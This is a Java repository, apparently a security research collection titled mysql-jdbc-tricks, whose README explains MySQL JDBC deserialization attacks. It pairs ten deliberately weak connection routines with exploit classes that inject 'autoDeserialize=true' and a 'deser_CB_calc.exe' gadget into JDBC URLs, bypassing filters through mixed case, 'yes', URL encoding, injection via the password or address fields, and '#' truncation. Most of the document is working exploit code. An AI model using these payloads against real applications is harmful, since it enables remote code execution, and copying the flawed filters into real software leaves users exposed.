├── .gitignore
├── README.md
├── pom.xml
└── src
└── main
└── java
└── org
└── y4sec
└── team
├── app
├── Application1.java
├── Application10.java
├── Application2.java
├── Application3.java
├── Application4.java
├── Application5.java
├── Application6.java
├── Application7.java
├── Application8.java
└── Application9.java
└── exploit
├── Example1.java
├── Example10.java
├── Example2.java
├── Example3.java
├── Example4.java
├── Example5.java
├── Example6.java
├── Example7.java
├── Example7Bypass.java
├── Example8.java
├── Example8Bypass.java
├── Example9.java
└── Example9Bypass.java
/.gitignore:
--------------------------------------------------------------------------------
1 | target/
2 | !.mvn/wrapper/maven-wrapper.jar
3 | !**/src/main/**/target/
4 | !**/src/test/**/target/
5 |
6 | ### IntelliJ IDEA ###
7 | .idea/modules.xml
8 | .idea/jarRepositories.xml
9 | .idea/compiler.xml
10 | .idea/libraries/
11 | *.iws
12 | *.iml
13 | *.ipr
14 |
15 | ### Eclipse ###
16 | .apt_generated
17 | .classpath
18 | .factorypath
19 | .project
20 | .settings
21 | .springBeans
22 | .sts4-cache
23 |
24 | ### NetBeans ###
25 | /nbproject/private/
26 | /nbbuild/
27 | /dist/
28 | /nbdist/
29 | /.nb-gradle/
30 | build/
31 | !**/src/main/**/build/
32 | !**/src/test/**/build/
33 |
34 | ### VS Code ###
35 | .vscode/
36 |
37 | ### Mac OS ###
38 | .DS_Store
39 |
40 | .idea/
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | ## mysql-jdbc-tricks
2 |
3 | 这里是很多`MySQL JDBC Attack`的小技巧,我仅在`MySQL`的`JDBC`驱动中测试,这里的技巧可能在其他类型的数据库驱动中也存在
4 |
5 | 文章:https://mp.weixin.qq.com/s/lmoWKK41ZQzZOh-P26VUng
6 |
7 | 推荐搭建:推荐配合 https://github.com/4ra1n/mysql-fake-server 使用
8 |
9 | ### 基本示例
10 |
11 | 参考`Application1`和`Example1`代码
12 |
13 | 这是一个不存在任何过滤的情况,直接执行即可`RCE`
14 |
15 | ### 大小写绕过
16 |
17 | 参考`Application1`和`Example1`代码
18 |
19 | 这里展示了一种简单的防护和绕过,`MySQL`驱动对于连接参数的大小不做限制,如果开发者不做大小写限制,将会被轻易饶过
20 |
21 | ### YES绕过
22 |
23 | 参考`Application3`和`Example3`代码
24 |
25 | 这里展示了一种简单的防护和绕过,`MySQL`驱动允许的`Bool`值是包含`true/yes`两种的,因此存在一种绕过
26 |
27 | ### 编码绕过
28 |
29 | 参考`Application4`和`Example4`代码
30 |
31 | 这里展示了某些情况下的绕过,`MySQL`驱动允许`URL`编码,因此如果开发者没有按照标准`URL`解析和过滤,将会存在绕过
32 |
33 | ### 暂时的安全
34 |
35 | 参考`Application5`和`Example5`代码
36 |
37 | 对于这种情况,似乎是安全了,或许有其他的绕过?
38 |
39 | ### 另一种形式的传参
40 |
41 | 参考`Application6`和`Example6`代码
42 |
43 | 这也是`JDBC`攻击很常见的一种情况
44 |
45 | ### 额外参数检查绕过
46 |
47 | 参考`Application7`和`Example7Bypass`代码
48 |
49 | 限制额外连接参数情况下如何绕过
50 |
51 | ### 特殊情况下的#号绕过
52 |
53 | 参考`Application8`和`Example8Bypass`代码
54 |
55 | 一种特殊情况的绕过,属于一种逻辑漏洞
56 |
57 | ### 另一种特殊场景的绕过
58 |
59 | 参考`Application9`和`Example9Bypass`代码
60 |
61 | 另一种特殊情况的绕过,开发者忽略某些参数过滤导致的绕过
62 |
63 | ### 可能安全
64 |
65 | 参考`Application10`和`Example10`代码
66 |
67 | 对于这种情况,似乎是安全了,或许有其他的绕过?
68 |
--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 4.0.0
6 |
7 | org.y4sec
8 | mysql-jdbc-tricks
9 | 1.0
10 |
11 |
12 | 8
13 | 8
14 | UTF-8
15 |
16 |
17 |
18 |
19 | mysql
20 | mysql-connector-java
21 | 6.0.2
22 |
23 |
24 | commons-beanutils
25 | commons-beanutils
26 | 1.9.4
27 |
28 |
29 |
30 |
--------------------------------------------------------------------------------
/src/main/java/org/y4sec/team/app/Application1.java:
--------------------------------------------------------------------------------
1 | package org.y4sec.team.app;
2 |
3 | import java.sql.DriverManager;
4 |
5 | public class Application1 {
6 | public static void connection(String url){
7 | try {
8 | Class.forName("com.mysql.cj.jdbc.Driver");
9 | DriverManager.getConnection(url);
10 | } catch (Exception e) {
11 | e.printStackTrace();
12 | }
13 | }
14 | }
15 |
--------------------------------------------------------------------------------
/src/main/java/org/y4sec/team/app/Application10.java:
--------------------------------------------------------------------------------
1 | package org.y4sec.team.app;
2 |
3 | import java.sql.DriverManager;
4 |
5 | public class Application10 {
6 | public static void connection(String addr, String user, String db, String password, String extra) {
7 | try {
8 | String url = String.format("jdbc:mysql://%s/%s?", addr, db);
9 |
10 | StringBuilder sb = new StringBuilder();
11 | sb.append("user=");
12 | sb.append(check(user));
13 | sb.append("&");
14 | sb.append("password=");
15 | sb.append(check(password));
16 |
17 | if (!extra.equals("")) {
18 | sb.append("&");
19 | sb.append(check(extra));
20 | }
21 |
22 | url = url + sb;
23 |
24 | check(url);
25 |
26 | System.out.println(url);
27 |
28 | Class.forName("com.mysql.cj.jdbc.Driver");
29 | DriverManager.getConnection(url);
30 | } catch (Exception e) {
31 | e.printStackTrace();
32 | }
33 | }
34 |
35 | private static String check(String params) {
36 | if (params.contains("autoDeserialize")) {
37 | throw new RuntimeException("you are hacker");
38 | }
39 | return params;
40 | }
41 | }
42 |
--------------------------------------------------------------------------------
/src/main/java/org/y4sec/team/app/Application2.java:
--------------------------------------------------------------------------------
1 | package org.y4sec.team.app;
2 |
3 | import java.net.URI;
4 | import java.sql.DriverManager;
5 | import java.util.HashMap;
6 | import java.util.Map;
7 |
8 | public class Application2 {
9 | public static void connection(String url){
10 | try {
11 | if(!check(url)) {
12 | System.out.println("you are hacker");
13 | return;
14 | }
15 | Class.forName("com.mysql.cj.jdbc.Driver");
16 | DriverManager.getConnection(url);
17 | } catch (Exception e) {
18 | e.printStackTrace();
19 | }
20 | }
21 |
22 | private static boolean check(String jdbcUrl){
23 | try {
24 | Map params = new HashMap<>();
25 | String query = jdbcUrl.split("\\?")[1];
26 | if (query != null) {
27 | String[] pairs = query.split("&");
28 | for (String pair : pairs) {
29 | String[] keyValue = pair.split("=");
30 | String key = keyValue[0];
31 | String value = keyValue.length > 1 ? keyValue[1] : "";
32 | params.put(key, value);
33 | }
34 | }
35 |
36 | System.out.println("Params: " + params);
37 |
38 | for (Map.Entry p: params.entrySet()){
39 | if (p.getKey().equals("autoDeserialize")) {
40 | if(p.getValue().equals("true")){
41 | return false;
42 | }
43 | }
44 | }
45 |
46 | return true;
47 | } catch (Exception e) {
48 | e.printStackTrace();
49 | return false;
50 | }
51 | }
52 | }
53 |
--------------------------------------------------------------------------------
/src/main/java/org/y4sec/team/app/Application3.java:
--------------------------------------------------------------------------------
1 | package org.y4sec.team.app;
2 |
3 | import java.net.URI;
4 | import java.sql.DriverManager;
5 | import java.util.HashMap;
6 | import java.util.Map;
7 |
8 | public class Application3 {
9 | public static void connection(String url){
10 | try {
11 | if(!check(url)) {
12 | System.out.println("you are hacker");
13 | return;
14 | }
15 | Class.forName("com.mysql.cj.jdbc.Driver");
16 | DriverManager.getConnection(url);
17 | } catch (Exception e) {
18 | e.printStackTrace();
19 | }
20 | }
21 |
22 | private static boolean check(String jdbcUrl){
23 | try {
24 | Map params = new HashMap<>();
25 | String query = jdbcUrl.split("\\?")[1];
26 | if (query != null) {
27 | String[] pairs = query.split("&");
28 | for (String pair : pairs) {
29 | String[] keyValue = pair.split("=");
30 | String key = keyValue[0];
31 | String value = keyValue.length > 1 ? keyValue[1] : "";
32 | params.put(key, value);
33 | }
34 | }
35 |
36 | System.out.println("Params: " + params);
37 |
38 | for (Map.Entry p: params.entrySet()){
39 | if (p.getKey().equals("autoDeserialize")) {
40 | String value = p.getValue();
41 | value = value.toLowerCase();
42 | if(value.equals("true")){
43 | return false;
44 | }
45 | }
46 | }
47 |
48 | return true;
49 | } catch (Exception e) {
50 | e.printStackTrace();
51 | return false;
52 | }
53 | }
54 | }
55 |
--------------------------------------------------------------------------------
/src/main/java/org/y4sec/team/app/Application4.java:
--------------------------------------------------------------------------------
1 | package org.y4sec.team.app;
2 |
3 | import java.net.URI;
4 | import java.sql.DriverManager;
5 | import java.util.HashMap;
6 | import java.util.Map;
7 |
8 | public class Application4 {
9 | public static void connection(String url) {
10 | try {
11 | if (!check(url)) {
12 | System.out.println("you are hacker");
13 | return;
14 | }
15 | Class.forName("com.mysql.cj.jdbc.Driver");
16 | DriverManager.getConnection(url);
17 | } catch (Exception e) {
18 | e.printStackTrace();
19 | }
20 | }
21 |
22 | private static boolean check(String jdbcUrl) {
23 | try {
24 | Map params = new HashMap<>();
25 | String query = jdbcUrl.split("\\?")[1];
26 | if (query != null) {
27 | String[] pairs = query.split("&");
28 | for (String pair : pairs) {
29 | String[] keyValue = pair.split("=");
30 | String key = keyValue[0];
31 | String value = keyValue.length > 1 ? keyValue[1] : "";
32 | params.put(key, value);
33 | }
34 | }
35 |
36 | System.out.println("Params: " + params);
37 |
38 | for (Map.Entry p : params.entrySet()) {
39 | if (p.getKey().equals("autoDeserialize")) {
40 | String value = p.getValue();
41 | value = value.toLowerCase();
42 | if (value.equals("true") || value.equals("yes")) {
43 | return false;
44 | }
45 | }
46 | }
47 |
48 | return true;
49 | } catch (Exception e) {
50 | e.printStackTrace();
51 | return false;
52 | }
53 | }
54 | }
55 |
--------------------------------------------------------------------------------
/src/main/java/org/y4sec/team/app/Application5.java:
--------------------------------------------------------------------------------
1 | package org.y4sec.team.app;
2 |
3 | import java.net.URI;
4 | import java.sql.DriverManager;
5 | import java.util.HashMap;
6 | import java.util.Map;
7 |
8 | public class Application5 {
9 | public static void connection(String url) {
10 | try {
11 | if (!check(url)) {
12 | System.out.println("you are hacker");
13 | return;
14 | }
15 | Class.forName("com.mysql.cj.jdbc.Driver");
16 | DriverManager.getConnection(url);
17 | } catch (Exception e) {
18 | e.printStackTrace();
19 | }
20 | }
21 |
22 | private static boolean check(String jdbcUrl) {
23 | try {
24 | URI uri = new URI(jdbcUrl.replace("jdbc:", ""));
25 |
26 | String host = uri.getHost();
27 | int port = uri.getPort();
28 | String path = uri.getPath();
29 | String dbname = path.substring(1);
30 |
31 | Map params = new HashMap<>();
32 | String query = uri.getQuery();
33 | if (query != null) {
34 | String[] pairs = query.split("&");
35 | for (String pair : pairs) {
36 | String[] keyValue = pair.split("=");
37 | String key = keyValue[0];
38 | String value = keyValue.length > 1 ? keyValue[1] : "";
39 | params.put(key, value);
40 | }
41 | }
42 |
43 | System.out.println("Host: " + host);
44 | System.out.println("Port: " + port);
45 | System.out.println("DB Name: " + dbname);
46 | System.out.println("Params: " + params);
47 |
48 | for (Map.Entry p : params.entrySet()) {
49 | if (p.getKey().equals("autoDeserialize")) {
50 | String value = p.getValue();
51 | value = value.toLowerCase();
52 | if (value.equals("true") || value.equals("yes")) {
53 | return false;
54 | }
55 | }
56 | }
57 |
58 | return true;
59 | } catch (Exception e) {
60 | e.printStackTrace();
61 | return false;
62 | }
63 | }
64 | }
65 |
--------------------------------------------------------------------------------
/src/main/java/org/y4sec/team/app/Application6.java:
--------------------------------------------------------------------------------
1 | package org.y4sec.team.app;
2 |
3 | import java.net.URLDecoder;
4 | import java.sql.DriverManager;
5 |
6 | public class Application6 {
7 | public static void connection(String addr,String user,String db,String password,String extra) {
8 | try {
9 | String url = String.format("jdbc:mysql://%s/%s?",addr,db);
10 |
11 | StringBuilder sb = new StringBuilder();
12 | sb.append("user=");
13 | sb.append(user);
14 | sb.append("&");
15 | sb.append("password=");
16 | sb.append(password);
17 | if (!extra.equals("")){
18 | sb.append("&");
19 | sb.append(extra);
20 | }
21 |
22 | url = url + sb;
23 |
24 | Class.forName("com.mysql.cj.jdbc.Driver");
25 | DriverManager.getConnection(url);
26 | } catch (Exception e) {
27 | e.printStackTrace();
28 | }
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/src/main/java/org/y4sec/team/app/Application7.java:
--------------------------------------------------------------------------------
1 | package org.y4sec.team.app;
2 |
3 | import java.sql.DriverManager;
4 | import java.util.HashMap;
5 | import java.util.Map;
6 |
7 | public class Application7 {
8 | public static void connection(String addr,String user,String db,String password,String extra) {
9 | try {
10 | String url = String.format("jdbc:mysql://%s/%s?",addr,db);
11 |
12 | StringBuilder sb = new StringBuilder();
13 | sb.append("user=");
14 | sb.append(user);
15 | sb.append("&");
16 | sb.append("password=");
17 | sb.append(password);
18 |
19 | if (!check(extra)){
20 | System.out.println("you are hacker");
21 | return;
22 | }
23 |
24 | if (!extra.equals("")){
25 | sb.append("&");
26 | sb.append(extra);
27 | }
28 |
29 | url = url + sb;
30 |
31 | System.out.println(url);
32 |
33 | Class.forName("com.mysql.cj.jdbc.Driver");
34 | DriverManager.getConnection(url);
35 | } catch (Exception e) {
36 | e.printStackTrace();
37 | }
38 | }
39 |
40 | private static boolean check(String params){
41 | try {
42 | return !params.contains("autoDeserialize");
43 | } catch (Exception e) {
44 | e.printStackTrace();
45 | return false;
46 | }
47 | }
48 | }
49 |
--------------------------------------------------------------------------------
/src/main/java/org/y4sec/team/app/Application8.java:
--------------------------------------------------------------------------------
1 | package org.y4sec.team.app;
2 |
3 | import java.sql.DriverManager;
4 |
5 | public class Application8 {
6 | public static void connection(String addr, String user, String db, String password, String extra) {
7 | try {
8 | String url = String.format("jdbc:mysql://%s/%s?", addr, db);
9 |
10 | StringBuilder sb = new StringBuilder();
11 | sb.append("user=");
12 | sb.append(user);
13 | sb.append("&");
14 | sb.append("password=");
15 | sb.append(password);
16 |
17 | if (!check(extra)) {
18 | System.out.println("you are hacker");
19 | return;
20 | }
21 |
22 | if (!extra.equals("")) {
23 | sb.append("&");
24 | sb.append(extra);
25 | }
26 |
27 | if (url.endsWith("?")) {
28 | url = url + sb + "autoDeserialize=false";
29 | } else {
30 | url = url + sb + "&autoDeserialize=false";
31 | }
32 |
33 | System.out.println(url);
34 |
35 | Class.forName("com.mysql.cj.jdbc.Driver");
36 | DriverManager.getConnection(url);
37 | } catch (Exception e) {
38 | e.printStackTrace();
39 | }
40 | }
41 |
42 | private static boolean check(String params) {
43 | try {
44 | return !params.contains("autoDeserialize");
45 | } catch (Exception e) {
46 | e.printStackTrace();
47 | return false;
48 | }
49 | }
50 | }
51 |
--------------------------------------------------------------------------------
/src/main/java/org/y4sec/team/app/Application9.java:
--------------------------------------------------------------------------------
1 | package org.y4sec.team.app;
2 |
3 | import java.sql.DriverManager;
4 |
5 | public class Application9 {
6 | public static void connection(String addr, String user, String db, String password, String extra) {
7 | try {
8 | String url = String.format("jdbc:mysql://%s/%s?", addr, db);
9 |
10 | StringBuilder sb = new StringBuilder();
11 | sb.append("user=");
12 | sb.append(check(user));
13 | sb.append("&");
14 | sb.append("password=");
15 | sb.append(check(password));
16 |
17 | if (!extra.equals("")) {
18 | sb.append("&");
19 | sb.append(check(extra));
20 | }
21 |
22 | url = url + sb;
23 |
24 | System.out.println(url);
25 |
26 | Class.forName("com.mysql.cj.jdbc.Driver");
27 | DriverManager.getConnection(url);
28 | } catch (Exception e) {
29 | e.printStackTrace();
30 | }
31 | }
32 |
33 | private static String check(String params) {
34 | if (params.contains("autoDeserialize")) {
35 | throw new RuntimeException("you are hacker");
36 | }
37 | return params;
38 | }
39 | }
40 |
--------------------------------------------------------------------------------
/src/main/java/org/y4sec/team/exploit/Example1.java:
--------------------------------------------------------------------------------
1 | package org.y4sec.team.exploit;
2 |
3 | import org.y4sec.team.app.Application1;
4 |
5 | public class Example1 {
6 | public static void main(String[] args) {
7 | String addr = "127.0.0.1:62787";
8 | String params = "detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe";
9 | String url = String.format( "jdbc:mysql://%s/test?%s",addr,params);
10 |
11 | Application1.connection(url);
12 | }
13 | }
14 |
--------------------------------------------------------------------------------
/src/main/java/org/y4sec/team/exploit/Example10.java:
--------------------------------------------------------------------------------
1 | package org.y4sec.team.exploit;
2 |
3 | import org.y4sec.team.app.Application10;
4 |
5 | public class Example10 {
6 | public static void main(String[] args) {
7 | // 可控内容
8 | String addr = "127.0.0.1:62787/test?detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe&#";
9 | String user = "deser_CB_calc.exe";
10 | String password = "test";
11 | String db = "test";
12 | String extra = "";
13 |
14 | Application10.connection(addr,user,db,password,extra);
15 | }
16 | }
17 |
--------------------------------------------------------------------------------
/src/main/java/org/y4sec/team/exploit/Example2.java:
--------------------------------------------------------------------------------
1 | package org.y4sec.team.exploit;
2 |
3 | import org.y4sec.team.app.Application2;
4 |
5 | public class Example2 {
6 | public static void main(String[] args) {
7 | String addr = "127.0.0.1:62787";
8 | String params = "detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe";
9 | String url = String.format("jdbc:mysql://%s/test?%s", addr, params);
10 |
11 | Application2.connection(url);
12 |
13 | addr = "127.0.0.1:62787";
14 | params = "detectCustomCollations=true&autoDeserialize=tRue&user=deser_CB_calc.exe";
15 | url = String.format("jdbc:mysql://%s/test?%s", addr, params);
16 |
17 | Application2.connection(url);
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/src/main/java/org/y4sec/team/exploit/Example3.java:
--------------------------------------------------------------------------------
1 | package org.y4sec.team.exploit;
2 |
3 | import org.y4sec.team.app.Application3;
4 |
5 | public class Example3 {
6 | public static void main(String[] args) {
7 | String addr = "127.0.0.1:62787";
8 | String params = "detectCustomCollations=true&autoDeserialize=tRue&user=deser_CB_calc.exe";
9 | String url = String.format("jdbc:mysql://%s/test?%s", addr, params);
10 |
11 | Application3.connection(url);
12 |
13 | addr = "127.0.0.1:62787";
14 | params = "detectCustomCollations=true&autoDeserialize=yes&user=deser_CB_calc.exe";
15 | url = String.format("jdbc:mysql://%s/test?%s", addr, params);
16 |
17 | Application3.connection(url);
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/src/main/java/org/y4sec/team/exploit/Example4.java:
--------------------------------------------------------------------------------
1 | package org.y4sec.team.exploit;
2 |
3 | import org.y4sec.team.app.Application4;
4 |
5 | public class Example4 {
6 | public static void main(String[] args) {
7 | String addr = "127.0.0.1:62787";
8 | String params = "detectCustomCollations=true&autoDeserialize=yes&user=deser_CB_calc.exe";
9 | String url = String.format("jdbc:mysql://%s/test?%s", addr, params);
10 |
11 | Application4.connection(url);
12 |
13 | addr = "127.0.0.1:62787";
14 | params = "detectCustomCollations=true&autoDeserialize=%74%72%75%65&user=deser_CB_calc.exe";
15 | url = String.format("jdbc:mysql://%s/test?%s", addr, params);
16 |
17 | Application4.connection(url);
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/src/main/java/org/y4sec/team/exploit/Example5.java:
--------------------------------------------------------------------------------
1 | package org.y4sec.team.exploit;
2 |
3 | import org.y4sec.team.app.Application5;
4 |
5 | public class Example5 {
6 | public static void main(String[] args) {
7 | String addr = "127.0.0.1:62787";
8 | String params = "detectCustomCollations=true&autoDeserialize=%74%72%75%65&user=deser_CB_calc.exe";
9 | String url = String.format("jdbc:mysql://%s/test?%s", addr, params);
10 |
11 | Application5.connection(url);
12 | }
13 | }
14 |
--------------------------------------------------------------------------------
/src/main/java/org/y4sec/team/exploit/Example6.java:
--------------------------------------------------------------------------------
1 | package org.y4sec.team.exploit;
2 |
3 | import org.y4sec.team.app.Application6;
4 |
5 | public class Example6 {
6 | public static void main(String[] args) {
7 | // 可控内容
8 | String addr = "127.0.0.1:62787";
9 | String user = "deser_CB_calc.exe";
10 | String password = "test";
11 | String db = "test";
12 | String extra = "detectCustomCollations=true&autoDeserialize=true";
13 |
14 | Application6.connection(addr,user,db,password,extra);
15 | }
16 | }
17 |
--------------------------------------------------------------------------------
/src/main/java/org/y4sec/team/exploit/Example7.java:
--------------------------------------------------------------------------------
1 | package org.y4sec.team.exploit;
2 |
3 | import org.y4sec.team.app.Application7;
4 |
5 | public class Example7 {
6 | public static void main(String[] args) {
7 | // 可控内容
8 | String addr = "127.0.0.1:62787";
9 | String user = "deser_CB_calc.exe";
10 | String password = "test";
11 | String db = "test";
12 | String extra = "detectCustomCollations=true&autoDeserialize=true";
13 |
14 | Application7.connection(addr,user,db,password,extra);
15 | }
16 | }
17 |
--------------------------------------------------------------------------------
/src/main/java/org/y4sec/team/exploit/Example7Bypass.java:
--------------------------------------------------------------------------------
1 | package org.y4sec.team.exploit;
2 |
3 | import org.y4sec.team.app.Application7;
4 |
5 | public class Example7Bypass {
6 | public static void main(String[] args) {
7 | // 可控内容
8 | String addr = "127.0.0.1:62787";
9 | String user = "deser_CB_calc.exe";
10 | String password = "test&autoDeserialize=true&";
11 | String db = "test";
12 | String extra = "detectCustomCollations=true&";
13 |
14 | Application7.connection(addr,user,db,password,extra);
15 | }
16 | }
17 |
--------------------------------------------------------------------------------
/src/main/java/org/y4sec/team/exploit/Example8.java:
--------------------------------------------------------------------------------
1 | package org.y4sec.team.exploit;
2 |
3 | import org.y4sec.team.app.Application8;
4 |
5 | public class Example8 {
6 | public static void main(String[] args) {
7 | // 可控内容
8 | String addr = "127.0.0.1:62787";
9 | String user = "deser_CB_calc.exe";
10 | String password = "test&autoDeserialize=true&";
11 | String db = "test";
12 | String extra = "detectCustomCollations=true&";
13 |
14 | Application8.connection(addr,user,db,password,extra);
15 | }
16 | }
17 |
--------------------------------------------------------------------------------
/src/main/java/org/y4sec/team/exploit/Example8Bypass.java:
--------------------------------------------------------------------------------
1 | package org.y4sec.team.exploit;
2 |
3 | import org.y4sec.team.app.Application8;
4 |
5 | public class Example8Bypass {
6 | public static void main(String[] args) {
7 | // 可控内容
8 | String addr = "127.0.0.1:62787";
9 | String user = "deser_CB_calc.exe";
10 | String password = "test&autoDeserialize=true";
11 | String db = "test";
12 | String extra = "detectCustomCollations=true&#?";
13 |
14 | Application8.connection(addr,user,db,password,extra);
15 | }
16 | }
17 |
--------------------------------------------------------------------------------
/src/main/java/org/y4sec/team/exploit/Example9.java:
--------------------------------------------------------------------------------
1 | package org.y4sec.team.exploit;
2 |
3 | import org.y4sec.team.app.Application9;
4 |
5 | public class Example9 {
6 | public static void main(String[] args) {
7 | // 可控内容
8 | String addr = "127.0.0.1:62787";
9 | String user = "deser_CB_calc.exe";
10 | String password = "test&autoDeserialize=true&";
11 | String db = "test";
12 | String extra = "detectCustomCollations=true&";
13 |
14 | Application9.connection(addr,user,db,password,extra);
15 | }
16 | }
17 |
--------------------------------------------------------------------------------
/src/main/java/org/y4sec/team/exploit/Example9Bypass.java:
--------------------------------------------------------------------------------
1 | package org.y4sec.team.exploit;
2 |
3 | import org.y4sec.team.app.Application9;
4 |
5 | public class Example9Bypass {
6 | public static void main(String[] args) {
7 | // 可控内容
8 | String addr = "127.0.0.1:62787/test?detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe&#";
9 | String user = "deser_CB_calc.exe";
10 | String password = "test";
11 | String db = "test";
12 | String extra = "";
13 |
14 | Application9.connection(addr,user,db,password,extra);
15 | }
16 | }
17 |
--------------------------------------------------------------------------------